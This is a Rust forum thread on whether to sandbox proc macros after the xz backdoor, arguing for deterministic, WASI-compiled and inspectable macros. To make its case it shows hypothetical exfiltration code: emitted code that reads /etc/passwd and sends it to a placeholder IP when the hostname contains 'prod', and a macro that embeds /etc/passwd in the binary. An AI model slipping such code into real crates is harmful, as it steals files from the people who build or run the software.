Deterministic isolated proc-macros

I used to think proc macro sandboxing was a good idea.

Since the xz backdoor, I am now convinced it is nearly a waste of effort, at least from a backdoor prevention perspective. Network-isolated builds already provide most of the protection a proc macro sandbox would deliver.

A completely sandboxed proc macro can still generate backdoor code into a binary that uses it. That backdoor code -- when running in the compiled binary -- can sniff the date, inspect the local environment, and do arbitrary file or network activity.

The proc macro's execution is not the only danger point. The execution of the proc macro's generated code is an even bigger danger point, and that execution happens after build and deployment, hence outside any build sandbox.
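To make that concrete, here is a hypothetical sketch of what a fully sandboxed macro could still emit; the trigger condition, the file, and the address are all made up for illustration. The macro did nothing suspicious at expansion time; all the danger is in the emitted code, which runs in the deployed binary.

```rust
// Hypothetical code *emitted* by a fully sandboxed proc macro. Nothing
// here ran during the build; it runs wherever the compiled binary runs.
use std::io::Write;

fn maybe_phone_home() {
    // Runtime trigger (made up for illustration): only fire on machines
    // that look like production, long after the build finished.
    let looks_like_prod = std::env::var("HOSTNAME")
        .map(|h| h.contains("prod"))
        .unwrap_or(false);
    if looks_like_prod {
        // Arbitrary file and network activity, entirely outside any
        // build sandbox (203.0.113.1 is a documentation address).
        if let Ok(secret) = std::fs::read_to_string("/etc/passwd") {
            if let Ok(mut stream) = std::net::TcpStream::connect("203.0.113.1:443") {
                let _ = stream.write_all(secret.as_bytes());
            }
        }
    }
}

fn main() {
    maybe_phone_home();
    // ... the crate's legitimate functionality ...
}
```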

Real progress on preventing proc-macro injection vulnerabilities will involve analyzing the generated code itself, which is no longer a sandboxing problem but a static analysis problem.

I understand the compiler team does not want to introduce trust boundaries inside the compiler. I am grimly convinced the xz backdoor shows that there is now no choice. Proc macros will become a primary attack vector unless we come up with some defense against the code they generate.

Edit: The possibility of caching the result of proc macro execution could actually dovetail nicely with some kind of inspection of the resulting token stream. Perhaps Rust should consider enforcing purely deterministic proc macros, and passing things like database schemas as plain string input to the macro. That would work naturally with deterministic caching of proc macro results, and the resulting code would be inspectable for assurance.
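A minimal sketch of what that shape could look like, with hypothetical names (`derive_queries` is not a real crate): the macro receives the schema purely as tokens, so identical input always yields identical output, which is exactly the property both a result cache and expansion-time inspection need.

```rust
// Hypothetical proc-macro crate: a pure function from tokens to tokens.
// The schema arrives as a plain string literal in the input -- the macro
// never reads DATABASE_URL, the filesystem, or the network -- so its
// expansion is deterministic and safely cacheable.
//
// Call site:
//   derive_queries!("CREATE TABLE users (id BIGINT PRIMARY KEY, name TEXT);");
use proc_macro::TokenStream;

#[proc_macro]
pub fn derive_queries(input: TokenStream) -> TokenStream {
    // Everything the macro needs is in `input`: same tokens in,
    // same tokens out, every time, on every machine.
    let _schema = input.to_string();
    // ... generate typed query code from `_schema` alone ...
    TokenStream::new()
}
```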

2 Likes

I'm not sure how the xz backdoor is relevant here, as the actual backdoor was only present in a pre-generated build script that was distributed to distros; it would not have worked if the maintainers had generated that script themselves. In proc-macro terms, this would be equivalent to distributing a backdoor in the cached output of the proc macro.

3 Likes

I have to disagree with that for two reasons:

  1. You can do A LOT of things if you are "just" network-isolated: for example, write a file somewhere on disk, or read /etc/passwd to include it in the generated code (a sketch follows this list). A malicious macro could potentially even swap out the Rust compiler for a backdoored version (thus spreading to other projects compiled on that machine), or, depending on the sandbox implementation, read from/write to /dev/tcp/<ip>/<port> or execute other commands on the system (e.g. netcat) to get around the network restriction. Hence I'd argue that "network-isolated builds" alone bring barely any protection unless the build effectively runs in a separate VM (or maybe via Docker), which is more than just "network-isolated".
  2. There are situations where you compile code but do not execute the output, for example during CI/CD (assuming execution of tests happens in a different container/VM). There, leaking data would be problematic, e.g. leaking the key used to sign the resulting binaries by embedding it in the compiled binary.
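Here is a minimal sketch of the first point, assuming a sandbox that blocks only the network (the macro name is made up): nothing below touches the network at build time, yet the file still leaves the machine inside the published artifact or the deployed binary.

```rust
// Hypothetical proc macro: no network access needed at build time.
// The sensitive file is read during *expansion* and baked into the
// compiled binary as a constant, to be recovered later from the
// artifact itself or exfiltrated wherever the binary ends up running.
use proc_macro::TokenStream;

#[proc_macro]
pub fn helpful_setup(_input: TokenStream) -> TokenStream {
    let leaked = std::fs::read_to_string("/etc/passwd").unwrap_or_default();
    // Emits: pub const LEAKED: &str = "<contents of /etc/passwd>";
    // (Debug-formatting a String produces a valid, escaped string literal.)
    format!("pub const LEAKED: &str = {leaked:?};").parse().unwrap()
}
```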

Any library you pull in (and proc macros, yes) effectively has (arbitrary) code execution where the executable is run -- there is absolutely no way around that -- but it should not have code execution on the device compiling the code, which is often where a lot of valuable things are stored, like SSH private keys.

Proc macros can be used to introduce backdoors into the final executable, but so can any library you pull in that doesn't use proc macros at all. I'd argue this is more about protecting the machine you compile on than the machine the result is executed on, though in practice they are often the same machine.

3 Likes

I used to think it was pointless too, but I've changed my mind on this. It's not just about whether a malicious crate can cause damage at all, but about how difficult it is to do, and most importantly, how visible the attempt has to be in the source code.

To be sure that a crate is not malicious, it's necessary to review its source code. Without sandboxing, crates have lots of opportunities to detect their environment in a subtle way, and many sneaky ways to run additional code. And proc macros are an ideal place to obfuscate and inject code.

So making proc macros more limited, more deterministic, easier to instrument, and isolated from the compiler itself makes it harder for attackers to sneak in a backdoor, and easier for reviewers to check a crate's behavior and spot suspicious code.

Specifically:

  • if macros are always compiled for a WASI target, they can't vary their own code with cfg() to attack only a CI build or a dev machine (see the sketch after this list).

  • if macros run sandboxed, they can't check for the presence of certain files or domains, or consult the time, to delay the attack until the right moment without the check being seen and potentially logged by the WASI runtime. So even if the macro can delay the attack, the check itself may raise suspicion.

  • if a macro is forced to be deterministic, then cargo-expand can show what it really produces.

  • running unsandboxed in the same process as the compiler is too powerful — a macro could modify the compiler itself and inject malware in a very indirect way. Running in an interpreter stops some sneaky ways of injecting code, like collisions of mangled symbols, modification of state belonging to the compiler, or smashing data on the stack to jump to code disguised as data.
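As an illustration of the first bullet (all names are hypothetical): a proc-macro crate compiled natively for the host can branch on host cfg() and environment variables and misbehave on only one kind of machine. Always compiling macros for a single WASI target removes that axis entirely.

```rust
// Hypothetical proc macro built for the *host* rather than for WASI.
// Because the macro crate itself is compiled natively, it can use cfg()
// and host environment variables to target, say, only Linux CI runners.
use proc_macro::TokenStream;

#[proc_macro_attribute]
pub fn instrument(_attr: TokenStream, item: TokenStream) -> TokenStream {
    // This branch exists only in the Linux build of the macro crate,
    // and fires only when a CI environment variable is present.
    #[cfg(target_os = "linux")]
    {
        if std::env::var_os("CI").is_some() {
            // inject extra tokens or perform side effects here,
            // invisible on every other machine
        }
    }
    item
}
```

With a deterministic, WASI-compiled macro, the same trick is both impossible to compile in and visible to cargo-expand, since the expansion can't depend on anything but the input tokens.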

18 Likes

That was a very minor aspect of the overall xz exploit. I think it's extremely likely that whoever was behind it could have escaped notice for just as long as they did even if all of their exploit code had been checked in, because they were hiding the exploit in places that reviewers tend to neglect: test code and build scripts. It doesn't help that Autoconf scripts are notoriously write-only code, but I think I could write a proc macro that injected something nasty into the generated code while still looking straightforward and innocuous enough to pass review.

1 Like

Even if isolating proc-macros and build scripts provides no meaningful defense against malicious code,

  • It's still good engineering practice: it makes a lot of bad ideas harder to implement. Lack of side effects, and lack of undocumented external inputs, is good for debuggability and reproducibility; even if there are “holes in the sandbox”, it will discourage people who haven't thought about the issues because the naive things won't work.

  • Perhaps later there will be a way to build on this work and do even better — perhaps Rust's successor (or a later version of Rust) will come up with a better scheme based on observing how it was done before. If nobody ever even tries because they can't do it perfectly, it's less likely we'll someday have a really good solution.

11 Likes

Another thing to consider is how built-in Cargo sandboxing would interact with external build sandboxing tools like Nix.

2 Likes

This topic was automatically closed 90 days after the last reply. New replies are no longer allowed.